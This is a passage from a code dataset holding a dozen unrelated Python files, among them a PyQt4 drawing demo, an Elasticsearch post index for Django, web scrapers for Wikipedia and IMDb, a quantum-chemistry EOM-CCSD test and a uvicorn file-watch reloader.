total_replica_results\n","repo_name":"advanced-analytics-tdp/execution-framework","sub_path":"execution_framework/model_prediction.py","file_name":"model_prediction.py","file_ext":"py","file_size_in_byte":19201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8743335097","text":"# -*- coding: utf-8 -*-\nfrom PyQt4 import QtCore, QtGui\n\n\nclass MyWindow(QtGui.QWidget):\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.resize(300, 300)\n\n def paintEvent(self, e):\n painter = QtGui.QPainter(self)\n black = QtCore.Qt.black\n white = QtCore.Qt.white\n red = QtCore.Qt.red\n painter.setPen(QtGui.QPen(black))\n painter.setBrush(QtGui.QBrush(white))\n painter.drawRect(3, 3, 294, 294)\n\n painter.setPen(QtGui.QPen(red, 1))\n painter.setFont(QtGui.QFont(\"Tahoma\", 12))\n\n painter.drawRect(QtCore.QRect(20, 40, 260, 200))\n textOption = QtGui.QTextOption(QtCore.Qt.AlignCenter)\n textOption.setFlags(QtGui.QTextOption.ShowTabsAndSpaces)\n painter.drawText(QtCore.QRectF(20., 40., 260., 200.),\n \"Показаны все\\tспециальные символы \",\n option=textOption)\n\n print(painter.boundingRect(20, 100, 260, 30,\n QtCore.Qt.AlignCenter | QtCore.Qt.TextShowMnemonic,\n \"Строка &1\"))\n\n print(painter.boundingRect(QtCore.QRect(20, 140, 260, 50),\n QtCore.Qt.AlignRight | QtCore.Qt.TextSingleLine,\n \"Строка 2\\nвсе специальные символы трактуются как пробелы и текст выводится в одну строку\"))\n\n print(painter.boundingRect(QtCore.QRectF(20., 190., 260., 50.),\n QtCore.Qt.AlignRight | QtCore.Qt.TextWordWrap,\n \"Строка 3 очень длинный текст на двух строках\"))\n\n print(painter.boundingRect(QtCore.QRectF(20., 40., 260., 200.),\n \"Показаны все\\tспециальные символы \",\n option=textOption))\n\n\nif __name__ == \"__main__\":\n import sys\n\n app = QtGui.QApplication(sys.argv)\n window = MyWindow()\n window.setWindowTitle(\"Класс QPainter\")\n window.show()\n sys.exit(app.exec_())","repo_name":"syurskyi/Python_Topics","sub_path":"140_gui/pyqt_pyside/examples/PyQt_PySide_book/006_Working with graphics/002_Class_QPainter/533. boundingRect.py","file_name":"533. boundingRect.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"44008562603","text":"import sys\nimport subprocess\nimport itertools\n\ntests = ( list(itertools.product(\n [\"unittest_optimizer\"],\n [1,2,4,15,50])) + \n [ (\"unittest_parser\",\"\") ] )\n\nfirst = True\nsuccess = True\nfor a,b in tests:\n if not first:\n print(\"\\n\\n\",flush=True)\n first = False\n args = [\"python3\",\"-m\",\"drug_cycling.tests.\"+a,\n str(b)]\n sargs = \" \".join(args)\n print(\"*\"*(len(sargs)+5),flush=True)\n print(\"With\",sargs,flush=True)\n print(\"*\"*(len(sargs)+5),flush=True)\n print(\"\\n\\n\",flush=True)\n res = subprocess.run(args).returncode\n if res != 0:\n print(\"Failed at {} {}\".format(a,b),\n file=sys.stderr)\n success = False\n\nif success:\n print(\"\\n\\nEverything went well\")\nelse:\n print(\"\\n\\nSomething went wrong\")\n","repo_name":"devingreene/drug_cycling","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4186367504","text":"import cv2 as cv\n\nfrom vboa.loadres.image_loader import ImageLoader, ImagesLoader\n\nESC_KEY_CODE = 27\n\n\ndef run_app(img_file: str | None, imgs_dir: str | None) -> None:\n if img_file:\n raw_data_img = ImageLoader.load(img_file)\n cv.imshow(winname='Image', mat=raw_data_img)\n elif imgs_dir:\n raw_data_images = ImagesLoader.load(imgs_dir)\n for file_name, raw_data in raw_data_images.items():\n cv.imshow(winname=f'Image {file_name}', \n mat=raw_data)\n else:\n cv.namedWindow(\"Blank\", cv.WINDOW_AUTOSIZE)\n\n key_code = cv.waitKey(0)\n if key_code == ESC_KEY_CODE:\n cv.destroyAllWindows()\n","repo_name":"Diklofozzz1/vision-based-obstacle-avoidance-system","sub_path":"vboa/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33477785745","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n# __author__ = \"Q1mi\"\n\n\"\"\"\nshelve模块\n与pickle的不同是:pickle dump多次,然后按顺序load多次。\nshelve打开一次就可以按照key来读取\n\"\"\"\n\nimport shelve\n\n\n# 定义一个测试类\nclass TestDemo(object):\n\tdef __init__(self, n):\n\t\tself.n = n\n\nt = TestDemo(123)\n\nname = [\"alex\", \"john\", \"eric\"]\n\nd = shelve.open(\"test3\")\n\nd[\"test1\"] = name # 持久化列表\nd[\"test2\"] = {\"a\": 1, \"b\": 2, \"c\": 3} # 持久化列表\nd[\"test3\"] = t # 持久化类实例\n\nd.close()\n\np = shelve.open(\"test3\")\nprint(p[\"test1\"])\ntemp = p.get(\"test3\")\nprint(temp.n)\np.close()\n","repo_name":"chenjinpeng1/S12","sub_path":"day5/shelve_ex.py","file_name":"shelve_ex.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26547716197","text":"import shutil\nfrom datetime import datetime\nfrom typing import Optional, List, Literal, Sequence, NamedTuple\n\nfrom django.conf import settings\nfrom elasticsearch import exceptions\n\nfrom elasticsearch_control import (\n AbstractIndex,\n ElasticsearchPaginator,\n QueryLimitParams,\n)\nfrom elasticsearch_control.transport import elasticsearch_connector\nfrom taged_web.helpers import icon_path\n\nT_Values = Literal[\"title\", \"content\", \"tags\", \"published_at\"]\n\n\nclass PostFile(NamedTuple):\n name: str\n icon: str\n\n\nclass PostIndex(AbstractIndex):\n title: str\n content: str\n tags: str\n published_at: datetime\n\n class Meta:\n index_name = \"company\"\n connector = elasticsearch_connector\n settings = {\n \"analysis\": {\n \"filter\": {\n \"ru_stop\": {\"type\": \"stop\", \"stopwords\": \"_russian_\"},\n \"ru_stemmer\": {\"type\": \"stemmer\", \"language\": \"russian\"},\n },\n \"analyzer\": {\n \"default\": {\n \"char_filter\": [\"html_strip\"],\n \"tokenizer\": \"standard\",\n \"filter\": [\"lowercase\", \"ru_stop\", \"ru_stemmer\"],\n }\n },\n }\n }\n\n @property\n def tags_list(self) -> List[str]:\n if isinstance(self.tags, str):\n return self.tags.split(\", \")\n if isinstance(self.tags, list):\n return self.tags\n\n def json(self) -> dict:\n return {\n \"title\": self.title,\n \"tags\": self.tags_list,\n \"published_at\": self.published_at,\n \"content\": self.content,\n }\n\n @classmethod\n def get(\n cls, id_: str, values: Optional[Sequence[T_Values]] = None, **kwargs\n ) -> Optional[\"PostIndex\"]:\n \"\"\"\n Возвращает заметку, если была найдена, в противном случае `None`.\n\n :param id_: Идентификатор заметки.\n :param values: Список полей, значения которых необходимы для возвращаемой заметки.\n :param kwargs: Дополнительные параметры для поиска.\n :return: Объект `PostIndex` или `None`.\n \"\"\"\n\n # Если указано, какие именно поля требуется вернуть, тогда формируем дополнительные параметры запроса\n extra = {\"_source\": values} if values else {}\n # Вызываем родительский метод `get`\n response = super().get(id_=id_, **extra, **kwargs)\n\n if response is not None and response.get(\"_source\"): # Если получили ответ\n post = PostIndex()\n data: dict = response[\"_source\"]\n\n # Если теги были получены и они в виде list, то переводим их в строку тегов, разделенную `, `\n if data.get(\"tags\") and isinstance(data[\"tags\"], list):\n data[\"tags\"] = \", \".join(data[\"tags\"])\n\n post.id = id_\n post.title = data.get(\"title\", \"\")\n post.content = data.get(\"content\", \"\")\n post.tags = data.get(\"tags\", \"\")\n\n if data.get(\"published_at\"):\n # Если дата была передана, то получаем объект из строки основываясь на следующем формате:\n # 2021-10-13T14:58:05.866799\n post.published_at = datetime.strptime(\n data[\"published_at\"][:19], \"%Y-%m-%dT%H:%M:%S\"\n )\n\n return post\n\n return None\n\n @classmethod\n def create(cls, title: str, tags: List[str], content: str) -> Optional[\"PostIndex\"]:\n \"\"\"\n Создает новую заметку и возвращает её.\n\n :param title: Заголовок.\n :param tags: Список тегов.\n :param content: Содержимое.\n :return: Заметка, если была создана или None.\n \"\"\"\n\n post = PostIndex()\n post.title = title\n post.tags = \", \".join(tags)\n post.content = content\n post.published_at = datetime.now()\n try:\n result = cls.Meta.connector.es.index(\n index=cls.Meta.index_name,\n document=post.json(),\n request_timeout=cls.Meta.connector.timeout,\n )\n except exceptions.ElasticsearchException:\n return None\n post.id = result.get(\"_id\", \"\")\n return post\n\n def delete(self) -> bool:\n \"\"\"\n При удалении заметки, удаляются также и все связанные с ней файлы\n \"\"\"\n\n if (settings.MEDIA_ROOT / self.id).exists():\n # Если есть прикрепленные файлы\n shutil.rmtree(settings.MEDIA_ROOT / self.id)\n return super().delete()\n\n @classmethod\n def filter(\n cls,\n tags_in: List[str] = None,\n tags_off: List[str] = None,\n string: str = \"\",\n values: Optional[Sequence[T_Values]] = None,\n sort: T_Values = None,\n sort_desc: bool = False,\n ) -> ElasticsearchPaginator:\n \"\"\"\n Возвращает список записей, которые были отфильтрованы.\n\n :param tags_in: Теги, которые должны находиться у записи.\n :param tags_off: Теги, которые должны отсутствовать у записи.\n :param string: Поиск строки в title и content.\n :param values: Список полей, которые надо вернуть для каждой заметки, либо `None`, тогда вернутся все поля.\n :param sort: Поле, по которому необходимо отсортировать, по умолчанию нет сортировки.\n :param sort_desc: Изменить порядок сортировки на обратный порядок?\n :return: `ElasticsearchPaginator`.\n \"\"\"\n\n # Если переменная tags_off не пустая, то она присваивается сама себе, иначе присваивается пустой список.\n tags_off = tags_off if tags_off else []\n # Если переменная tags_in не пустая, то она присваивается сама себе, иначе присваивается пустой список.\n tags_in = tags_in if tags_in else []\n\n # Теги всегда требуется возвращать\n if values is None:\n values = [\"title\", \"content\", \"tags\", \"published_at\"]\n if \"tags\" not in values:\n values.append(\"tags\")\n\n # Определяем параметр сортировки, если был указан\n sort_parameter = {sort: \"desc\" if sort_desc else \"asc\"} if sort else None\n\n query_params = QueryLimitParams(\n index=cls.Meta.index_name,\n source=values,\n query={\"bool\": {\"must\": []}},\n sort=sort_parameter,\n request_timeout=cls.Meta.connector.timeout,\n )\n\n # Если переменная string пустая и переменная tags_in не пустая, то выполняется поиск по тегам.\n if tags_in:\n query_params.query[\"bool\"][\"must\"].append(\n {\n \"match\": {\"tags\": \" \".join(tags_in)},\n }\n )\n\n # Поиск по строке в title и content\n if string:\n query_params.query[\"bool\"][\"must\"].append(\n {\n \"simple_query_string\": {\n \"query\": string,\n \"fields\": [\"title^2\", \"content\"],\n }\n }\n )\n\n if tags_off:\n query_params.query[\"bool\"][\"must_not\"] = [\n {\n \"match\": {\"tags\": \" \".join(tags_off)},\n }\n ]\n\n return ElasticsearchPaginator(\n es=cls.Meta.connector.es,\n params=query_params,\n convert_result=cls._convert_post_result,\n # extra\n tags_in=tags_in,\n tags_off=tags_off,\n )\n\n @staticmethod\n def _convert_post_result(res, tags_in, tags_off) -> List[dict]:\n # Присваивает переменной max_score максимальный балл из всех записей в ответе.\n max_score = float(res[\"hits\"][\"max_score\"] or 1)\n result = []\n # Проверяет, есть ли хоть одна запись в ответе.\n if res and res[\"hits\"][\"total\"][\"value\"]:\n for post in res[\"hits\"][\"hits\"]:\n if isinstance(post[\"_source\"][\"tags\"], str):\n # Переводим один тег в список из одного тега\n post[\"_source\"][\"tags\"] = [post[\"_source\"][\"tags\"]]\n # Если имеются необходимые теги (tags_in) и они встречаются в записи, а также\n # имеются нежелательные теги (tags_off) и они отсутствуют в записи\n # Пересечение тегов поста и тегов поиска равно списку тегов поиска (т.е. теги поиска содержатся в посте)\n if (\n not tags_in\n or sorted(list(set(post[\"_source\"][\"tags\"]) & set(tags_in)))\n == sorted(tags_in)\n ) and (\n not tags_off or not set(post[\"_source\"][\"tags\"]) & set(tags_off)\n ):\n result.append(\n {\n \"id\": post[\"_id\"],\n \"title\": post[\"_source\"].get(\"title\"),\n \"tags\": post[\"_source\"].get(\"tags\"),\n \"published_at\": post[\"_source\"].get(\"published_at\"),\n \"content\": post[\"_source\"].get(\"content\"),\n \"score\": round(float(post[\"_score\"] or 0) / max_score, 3),\n }\n )\n return result\n\n @classmethod\n def get_titles(cls, string: str, unavailable_tags: List[str]) -> List[str]:\n \"\"\"\n ## Возвращает заголовки, которые соответствуют искомой строке.\n\n :param string: Строка для поиска.\n :param unavailable_tags: Недоступные пользователю теги.\n :return: Список заголовков, которые соответствуют искомой подстроке или пустой список.\n \"\"\"\n\n # Поиск по строке в title и content\n res = cls.Meta.connector.es.search(\n index=cls.Meta.index_name,\n _source=[\"title\", \"tags\"],\n query={\n \"bool\": {\n \"must\": [\n {\n \"simple_query_string\": {\n \"query\": string,\n \"fields\": [\"title^2\"],\n }\n }\n ],\n \"must_not\": [\n {\"match\": {\"tags\": \" \".join(unavailable_tags)}},\n ],\n }\n },\n request_timeout=cls.Meta.connector.timeout,\n )\n # Проверяет, есть ли хоть одна запись в ответе.\n if res[\"hits\"][\"total\"][\"value\"]:\n return [line[\"_source\"][\"title\"] for line in res[\"hits\"][\"hits\"]]\n else:\n return []\n\n def get_files(self) -> List[PostFile]:\n \"\"\"\n ## Возвращаем список файлов, которые прикреплены к заметке\n\n :return: Список файлов\n \"\"\"\n\n files = []\n # Если существует папка для данного post_id и в ней есть файлы\n for f in (settings.MEDIA_ROOT / self.id).glob(\"*\"):\n if f.is_file():\n # Добавляем имя файла + иконку в список\n files.append(\n PostFile(name=f.name, icon=icon_path(f.name)),\n )\n return files\n\n @classmethod\n def tags_count(cls, tag_name: str):\n return cls.Meta.connector.es.count(\n index=cls.Meta.index_name,\n body={\"query\": {\"match\": {\"tags\": tag_name}}},\n request_timeout=settings.ELASTICSEARCH_TIMEOUT,\n )[\"count\"]\n","repo_name":"ig-rudenko/taged","sub_path":"taged_web/es_index.py","file_name":"es_index.py","file_ext":"py","file_size_in_byte":13186,"program_lang":"python","lang":"ru","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"33866584810","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 18 09:34:22 2019\n\n@author: Kaushik\n\"\"\"\n\nimport pandas as pd\n\nglobal tickers\n\ndata = pd.read_html('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\ntable = data[0]\n#print(table.head())\nsliced_table = table[1:]\nheader = table.iloc[0]\ncorrected_table = sliced_table.rename(columns=header)\n#print(corrected_table)\ntickers = corrected_table['Symbol'].tolist()\n#print (tickers)","repo_name":"kadharamkaushik/visualization_exam","sub_path":"q1_splist.py","file_name":"q1_splist.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70251821924","text":"# EOM CCSD\nimport os\nimport sys\n\nimport qcdb\n\nfrom ..utils import *\n\n\ndef check_eomccsd(return_value):\n ref = -75.633713836043\n ccsd_tot = -75.942608958748735\n ccsd_corl = -0.308895122705897\n root1_exc = 0.317644190387170\n root1_tot = -75.89014254\n root2_exc = 0.399118315871657\n root2_tot = -75.80866841\n root3_exc = 0.419648919776505\n root3_tot = -75.78813781\n root4_exc = 0.505153089073363\n root4_tot = -75.70263364\n root5_exc = 0.569331468468014\n root5_tot = -75.63845526\n root6_exc = 0.695937098625459\n root6_tot = -75.51184963\n root7_exc = 0.995506121301140\n root7_tot = -75.21228061\n root8_exc = 1.018576341192903\n root8_tot = -75.18921039\n root9_exc = 1.048599044061786\n root9_tot = -75.15918769\n root10_exc = 1.072014344987968\n root10_tot = -75.13577239\n root11_exc = 1.123688743818949\n root11_tot = -75.08409799\n root12_exc = 1.128736537578306\n root12_tot = -75.07905019\n\n # add all excited states being tested\n assert compare_values(ref, qcdb.variable(\"HF TOTAL ENERGY\"), 6, \"hf ref\")\n assert compare_values(ccsd_tot, qcdb.variable(\"CCSD TOTAL ENERGY\"), 6, \"ccsd tot\")\n assert compare_values(ccsd_corl, qcdb.variable(\"CCSD CORRELATION ENERGY\"), 6, \"ccsd corl\")\n assert compare_values(\n root1_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 1 EXCITATION ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 1 ext\"\n )\n assert compare_values(\n root1_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 1 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 1 total\"\n )\n assert compare_values(\n root2_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 2 EXCITATION ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 2 ext\"\n )\n assert compare_values(\n root2_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 2 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 2 total\"\n )\n assert compare_values(\n root3_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 3 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 3 ext\"\n )\n assert compare_values(\n root3_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 3 TOTAL ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 3 total\"\n )\n assert compare_values(\n root4_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 4 EXCITATION ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 4 ext\"\n )\n assert compare_values(\n root4_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 4 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 4 total\"\n )\n assert compare_values(\n root5_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 5 EXCITATION ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 5 ext\"\n )\n assert compare_values(\n root5_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 5 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 5 total\"\n )\n assert compare_values(\n root6_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 6 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 6 ext\"\n )\n assert compare_values(\n root6_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 6 TOTAL ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 6 total\"\n )\n assert compare_values(\n root7_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 7 EXCITATION ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 7 ext\"\n )\n assert compare_values(\n root7_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 7 TOTAL ENERGY - A1 SYMMETRY\"), 6, \"EOM-CCSD 0 ->7 total\"\n )\n assert compare_values(\n root8_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 8 EXCITATION ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 8 ext\"\n )\n assert compare_values(\n root8_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 8 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 8 total\"\n )\n assert compare_values(\n root9_exc, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 9 EXCITATION ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 9 ext\"\n )\n assert compare_values(\n root9_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 9 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 9 total\"\n )\n assert compare_values(\n root10_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 10 EXCITATION ENERGY - A2 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 10 ext\",\n )\n assert compare_values(\n root10_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 10 TOTAL ENERGY - A2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 10 total\"\n )\n assert compare_values(\n root11_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 11 EXCITATION ENERGY - B1 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 11 ext\",\n )\n assert compare_values(\n root11_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 11 TOTAL ENERGY - B1 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 11 total\"\n )\n assert compare_values(\n root12_exc,\n qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 12 EXCITATION ENERGY - B2 SYMMETRY\"),\n 6,\n \"EOM-CCSD 0 -> 12 ext\",\n )\n assert compare_values(\n root12_tot, qcdb.variable(\"EOM-CCSD ROOT 0 -> ROOT 12 TOTAL ENERGY - B2 SYMMETRY\"), 6, \"EOM-CCSD 0 -> 12 total\"\n )\n\n\n@using_nwchem\ndef test_1_eomccsd():\n h2o = qcdb.set_molecule(\n \"\"\"\n O 0.000000000000 0.000000000000 -0.123909374404\n H 0.000000000000 1.429936611037 0.983265845431\n H 0.000000000000 -1.429936611037 0.983265845431\n \"\"\"\n )\n\n qcdb.set_options(\n {\n \"basis\": \"6-31g*\",\n \"memory\": \"1500 mb\",\n \"scf__e_convergence\": 1.0e-10,\n #'nwchem_memory' : '1500 mb',\n #'nwchem_memory' : '[total, 1500, stack, 400, heap, 400, global, 700, mb]', #The way nwchem speak for memory may need to change\n #'nwchem_stack_memory' : '400 mb',\n #'nwchem_heap_memory' : '400 mb',\n #'nwchem_global_memory' : '700 mb',\n \"nwchem_scf__thresh\": 1.0e-10,\n \"nwchem_scf__tol2e\": 1.0e-10,\n \"nwchem_scf__rhf\": True,\n \"qc_module\": \"tce\",\n \"nwchem_tce__ccsd\": True,\n \"nwchem_tce__nroots\": 12,\n }\n )\n print(\"Testing EOM-CCSD...\")\n val = qcdb.energy(\"nwc-eom-ccsd\")\n check_eomccsd(val)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/tests/nwchem_tests/wip_test_eom_ccsd_h2o.py","file_name":"wip_test_eom_ccsd_h2o.py","file_ext":"py","file_size_in_byte":6110,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"3424148019","text":"import logging\nimport os\nimport re\nfrom pathlib import Path\nfrom socket import socket\nfrom typing import TYPE_CHECKING, Callable, List, Optional\n\nfrom watchgod import DefaultWatcher\n\nfrom uvicorn.config import Config\nfrom uvicorn.supervisors.basereload import BaseReload\n\nlogger = logging.getLogger(\"uvicorn.error\")\n\nif TYPE_CHECKING:\n DirEntry = os.DirEntry[str]\n\n\nclass CustomWatcher(DefaultWatcher):\n ignore_dotted_file_regex = r\"^\\/?(?:\\w+\\/)*(\\.\\w+)\"\n ignored: List[str] = []\n\n def __init__(self, root_path: str) -> None:\n for t in self.ignored_file_regexes:\n self.ignored.append(t)\n self.ignored.append(self.ignore_dotted_file_regex)\n self._ignored = tuple(re.compile(r) for r in self.ignored)\n super().__init__(root_path)\n\n def should_watch_file(self, entry: \"DirEntry\") -> bool:\n return not any(r.search(entry.name) for r in self._ignored)\n\n\nclass WatchGodReload(BaseReload):\n def __init__(\n self,\n config: Config,\n target: Callable[[Optional[List[socket]]], None],\n sockets: List[socket],\n ) -> None:\n super().__init__(config, target, sockets)\n self.reloader_name = \"watchgod\"\n self.watchers = []\n watch_dirs = {\n Path(watch_dir).resolve()\n for watch_dir in self.config.reload_dirs\n if Path(watch_dir).is_dir()\n }\n watch_dirs_set = set(watch_dirs)\n\n # remove directories that already have a parent watched, so that we don't have\n # duplicated change events\n for watch_dir in watch_dirs:\n for compare_dir in watch_dirs:\n if compare_dir is watch_dir:\n continue\n\n if compare_dir in watch_dir.parents:\n watch_dirs_set.remove(watch_dir)\n\n self.watch_dir_set = watch_dirs_set\n for w in watch_dirs_set:\n self.watchers.append(CustomWatcher(str(w)))\n\n def should_restart(self) -> bool:\n for watcher in self.watchers:\n change = watcher.check()\n if change != set():\n message = \"WatchGodReload detected file change in '%s'. Reloading...\"\n logger.warning(message, [c[1] for c in change])\n return True\n\n return False\n","repo_name":"Operation-Falcon/Attacksurfacemanagement","sub_path":"notebook/lib/python3.9/site-packages/uvicorn/supervisors/watchgodreload.py","file_name":"watchgodreload.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"69996190244","text":"import shutil\r\nimport sqlite3\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup as soup # HTML data structure\r\nfrom urllib.request import urlopen as uReq # Web client\r\n\r\n\r\n\r\npage_url = \"https://www.imdb.com/list/ls002913270/\"\r\n\r\n\r\n\r\n\r\nuClient = uReq(page_url)\r\n\r\npage_soup = soup(uClient.read(), \"html.parser\")\r\nuClient.close()\r\n\r\ncontainers = page_soup.findAll(\"div\", {\"class\": \"lister-item mode-detail\"})\r\nout_filename = \"graphics_cards.csv\"\r\n#headers = \"Personality Traits of Celebrities\\n\"\r\n\r\nconn = sqlite3.connect(r\"C:\\Users\\hp-p\\PycharmProjects\\beautifulsoup\\bollywood.db\")\r\ncursor = conn.cursor()\r\ncursor.execute(\"\"\"\r\nCREATE TABLE IF NOT EXISTS bollywood_tb \r\n(name TEXT,desc TEXT, image BLOB)\"\"\")\r\n\r\n\r\nj = 0\r\nfor container in containers:\r\n div_img = container.select('div', {\"class\": \"lister-item-image\"})\r\n image_tag = div_img[0].a.img\r\n image = None\r\n try:\r\n imgLink = image_tag.get('src')\r\n ext = imgLink[imgLink.rindex('.'):]\r\n if ext.startswith(\".png\"):\r\n ext = \".png\"\r\n elif ext.startswith(\".jpeg\"):\r\n ext = \".jpeg\"\r\n elif ext.startswith(\".jpg\"):\r\n ext = \".jpg\"\r\n elif ext.startswith(\".svg\"):\r\n ext = \".svg\"\r\n\r\n filen = str(j) + ext\r\n res = requests.get(imgLink, stream=True)\r\n\r\n with open(filen, \"wb\") as file:\r\n shutil.copyfileobj(res.raw, file)\r\n with open(filen, \"rb\") as file:\r\n image = file.read()\r\n except Exception as e:\r\n print(e)\r\n div = container.select('div', {\"class\": \"lister-item-content\"})\r\n name = div[1].select('a')[0].text\r\n content = div[1].select('p')[1].text\r\n try:\r\n cursor.execute(\"\"\" INSERT INTO bollywood_tb \r\n (name, desc, image) VALUES (?,?,?)\"\"\", (name, content, image))\r\n except:\r\n print('err')\r\n\r\n j+=1\r\n\r\nconn.commit()\r\ncursor.close()\r\nconn.close()","repo_name":"BlackHawk1809/crawl-and-scrap-data-using-python","sub_path":"extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44141330243","text":"\n#!/usr/bin/env python\n# coding: utf-8\n\nimport cv2 \nimport numpy as np\nimport sys\n#from matplotlib import pyplot as plt \ndef teste(testeimg):\n image = cv2.imread(testeimg) \n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) \n\n ret, thresh = cv2.threshold(gray, 0, 255, \n cv2.THRESH_BINARY_INV +\n cv2.THRESH_OTSU) \n cv2.imshow('image', thresh) \n\n kernel = np.ones((3, 3), np.uint8) \n closing = cv2.morphologyEx(thresh, cv2.MORPH_CLOSE, \n kernel, iterations = 2) \n bg = cv2.dilate(closing, kernel, iterations = 1) \n dist_transform = cv2.distanceTransform(closing, cv2.DIST_L2, 0) \n ret, fg = cv2.threshold(dist_transform, 0.02\n * dist_transform.max(), 255, 0) \n\n cv2.imshow('image2', fg) \n\n cv2.waitKey(0)\n","repo_name":"TiagoMilani/Projeto---Segmenta-o-de-objetos-em-imagens","sub_path":"BeW.py","file_name":"BeW.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"33648057189","text":"#deprecated by mouseoutputstack.py #\n\nfrom config import tap_timings\nfrom sendusbevents import SendUsbEvents\n\ndef check_single_tap_movement(cts):\n cts2 = cts.last_touchpad_state\n if (cts2 != None) \\\n and (cts.number_of_active_touch == 1) \\\n and (cts2.number_of_active_touch == 1) \\\n and (cts.tap_chain[0][0] == 1):\n time_delta = 1000*(cts.timestamp - cts.tap_chain[0][1])\n if time_delta > tap_timings[1]:\n fp1 = next(fp for fp in cts.slots if fp.touch==1)\n fp2 = next(fp for fp in cts2.slots if fp.touch==1)\n delx = fp1.abs_x - fp2.abs_x\n dely = fp1.abs_y - fp2.abs_y\n #return {'type':'single_movement','x':delx,'y':dely}\n return SendUsbEvents.move_mouse_queue_object(delx,dely)\n #print(\"Single Tap Movement:X %d,Y %d\"%(delx,dely))\n #Make sure that the number of touches is the same as it was\n\n \n\n\n \n","repo_name":"pragun/mouse-daw-controller","sub_path":"python-evdev-serial-relay/singletapmovement.py","file_name":"singletapmovement.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18781818006","text":"from module.jsonl import JsonLoader\nfrom discord.ext import commands\nclass Economy:\n def __init__(self, user_id):\n self.user_id=str(user_id)\n self.open_account()\n \n @property\n def economy(self):\n return JsonLoader(\"/home/container/jsonf/economy.json\")\n \n def open_account(self):\n cont=self.economy.cont\n if cont.get(self.user_id, None) is 